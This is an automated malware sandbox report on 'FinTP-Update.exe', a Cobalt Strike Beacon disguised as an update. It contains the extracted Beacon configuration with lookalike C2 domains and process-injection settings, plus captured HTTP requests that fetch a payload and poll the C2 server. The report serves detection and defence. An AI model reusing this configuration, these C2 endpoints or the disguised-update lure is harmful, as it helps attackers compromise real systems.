Windows Analysis Report
FinTP-Update.exe

Overview

General Information

Sample name: FinTP-Update.exe
Analysis ID: 1578576
MD5: 4038d28c25e96e0e4045b3bc1093f497
SHA1: 0e2dcc88362b508e3b317b890809fc7a7b37915d
SHA256: 87ae2867d3cd63d4dcefe95d7ada9cba63d77ac8d1b739177f0c7870ce0472b3
Tags: exe, user-smica83

Detection

CobaltStrike
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Detected potential crypto function
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • FinTP-Update.exe (PID: 1276 cmdline: "C:\Users\user\Desktop\FinTP-Update.exe" MD5: 4038D28C25E96E0E4045B3BC1093F497)
    • conhost.exe (PID: 1996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: Cobalt Strike, CobaltStrike
Description: Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
Attribution:
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 15000, "MaxGetSize": 2801745, "Jitter": 37, "C2Server": "www.finttp.ro,/rss/portallogin-gettask.html,www.flntp.ro,/rss/portallogin-gettask.html", "HttpPostUri": "/rss/portallogin-sendlogin.html", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 3931 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe", "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 309948737, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": ""}
Source | Rule | Description | Author | Strings
dump.pcap | Windows_Trojan_CobaltStrike_f0b627fc | Rule for beacon reflective loader | unknown
  • 0x1e16f:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 41 8B 84 24 98 00 00 00 25 FF FF FF 00 3D 42 42 42 00 75
  • 0x1f46a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 41 8B 84 24 98 00 00 00 25 FF FF FF 00 3D 42 42 42 00 75

Source | Rule | Description | Author | Strings
00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CobaltStrike_2 | Yara detected CobaltStrike | Joe Security
00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CobaltStrike_4 | Yara detected CobaltStrike | Joe Security
00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_CobaltStrike_f0b627fc | Rule for beacon reflective loader | unknown
  • 0x1f28e:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 41 8B 84 24 98 00 00 00 25 FF FF FF 00 3D 42 42 42 00 75
  • 0x2041f:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 41 8B 84 24 98 00 00 00 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2313200724.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CobaltStrike_2 | Yara detected CobaltStrike | Joe Security
          No Sigma rule has matched
          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
          2024-12-19T23:12:14.340202+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49705 | TCP
          2024-12-19T23:12:17.271253+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49706 | TCP
          2024-12-19T23:12:19.484501+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49707 | TCP
          2024-12-19T23:12:21.689438+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49708 | TCP
          2024-12-19T23:12:23.938801+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49710 | TCP
          2024-12-19T23:12:26.146640+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49717 | TCP
          2024-12-19T23:12:28.623297+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49725 | TCP
          2024-12-19T23:12:30.852350+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49731 | TCP
          2024-12-19T23:12:33.070480+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49738 | TCP
          2024-12-19T23:12:35.362742+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49744 | TCP
          2024-12-19T23:12:37.619541+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49750 | TCP
          2024-12-19T23:12:39.835436+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49756 | TCP
          2024-12-19T23:12:42.073130+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49762 | TCP
          2024-12-19T23:12:44.255883+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49768 | TCP
          2024-12-19T23:12:46.455049+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49773 | TCP
          2024-12-19T23:12:48.678819+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49780 | TCP
          2024-12-19T23:12:50.867126+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49786 | TCP
          2024-12-19T23:12:53.332796+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49792 | TCP
          2024-12-19T23:12:55.536771+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49798 | TCP
          2024-12-19T23:12:57.727238+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49804 | TCP
          2024-12-19T23:12:59.923490+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49810 | TCP
          2024-12-19T23:13:02.414598+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49816 | TCP
          2024-12-19T23:13:04.713196+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49822 | TCP
          2024-12-19T23:13:07.154589+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49829 | TCP
          2024-12-19T23:13:09.360049+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49835 | TCP
          2024-12-19T23:13:11.606752+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49843 | TCP
          2024-12-19T23:13:13.817857+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49850 | TCP
          2024-12-19T23:13:16.063530+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49856 | TCP
          2024-12-19T23:13:18.263363+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49862 | TCP
          2024-12-19T23:13:20.465077+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49868 | TCP
          2024-12-19T23:13:22.680981+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49874 | TCP
          2024-12-19T23:13:24.872501+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49880 | TCP
          2024-12-19T23:13:27.078589+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49886 | TCP
          2024-12-19T23:13:29.294801+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49892 | TCP
          2024-12-19T23:13:31.653829+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49898 | TCP
          2024-12-19T23:13:33.854578+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49905 | TCP
          2024-12-19T23:13:36.041029+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49911 | TCP
          2024-12-19T23:13:38.282346+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49917 | TCP
          2024-12-19T23:13:40.479064+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49923 | TCP
          2024-12-19T23:13:42.717053+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49929 | TCP
          2024-12-19T23:13:44.941571+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49935 | TCP
          2024-12-19T23:13:47.126874+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49941 | TCP
          2024-12-19T23:13:49.326528+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49947 | TCP
          2024-12-19T23:13:51.544160+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49953 | TCP
          2024-12-19T23:13:53.759357+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49959 | TCP
          2024-12-19T23:13:56.110383+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49965 | TCP
          2024-12-19T23:13:58.344816+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49971 | TCP
          2024-12-19T23:14:00.557948+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49977 | TCP
          2024-12-19T23:14:02.791434+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49983 | TCP
          2024-12-19T23:14:05.015988+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49989 | TCP
          2024-12-19T23:14:07.229524+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49995 | TCP
          2024-12-19T23:14:09.453436+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 50001 | TCP
          2024-12-19T23:14:11.708964+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 50007 | TCP

          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
          2024-12-19T23:12:10.800926+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49704 | 3.79.209.76 | 80 | TCP


          AV Detection

          Source: FinTP-Update.exe | Avira: detected
          Source: 00000000.00000003.2313200724.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 15000, "MaxGetSize": 2801745, "Jitter": 37, "C2Server": "www.finttp.ro,/rss/portallogin-gettask.html,www.flntp.ro,/rss/portallogin-gettask.html", "HttpPostUri": "/rss/portallogin-sendlogin.html", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 3931 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe", "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 309948737, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": ""}
          Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
          Source: unknown | HTTPS traffic detected: 3.79.209.76:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 3.79.209.76:443 -> 192.168.2.5:49706 version: TLS 1.2
          Source: FinTP-Update.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: C:\Users\dan\source\repos\ConsoleApplication6\x64\Release\ConsoleApplication6.pdb$$ source: FinTP-Update.exe
          Source: Binary string: C:\Users\dan\source\repos\ConsoleApplication6\x64\Release\ConsoleApplication6.pdb source: FinTP-Update.exe

          Networking

          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49707
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49717
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49705
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49708
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49706
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49710
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49731
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49744
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49738
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49762
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49750
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49768
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49786
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49773
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49792
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49810
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49804
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49780
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49756
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49822
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49843
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49816
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49798
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49829
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49874
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49850
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49835
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49892
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49898
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49856
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49868
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49880
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49917
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49862
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49929
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49911
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49923
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49953
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49905
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49935
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49995
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49965
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:50007
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49983
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49959
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49947
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49725
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49886
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49989
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49941
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49977
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:50001
          Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49971
          Source: Malware configuration extractor | URLs: www.finttp.ro
          Source: global traffic | HTTP traffic detected:
            GET /fintp.x64.bin HTTP/1.0
            Host: www.flntp.ro
          Source: Joe Sandbox View | ASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49704 -> 3.79.209.76:80
          Source: global traffic | HTTP traffic detected:
            GET /rss/portallogin-gettask.html HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Host: www.flntp.ro
            Accept-Encoding: gzip, deflate
            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
            Connection: Keep-Alive
            Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
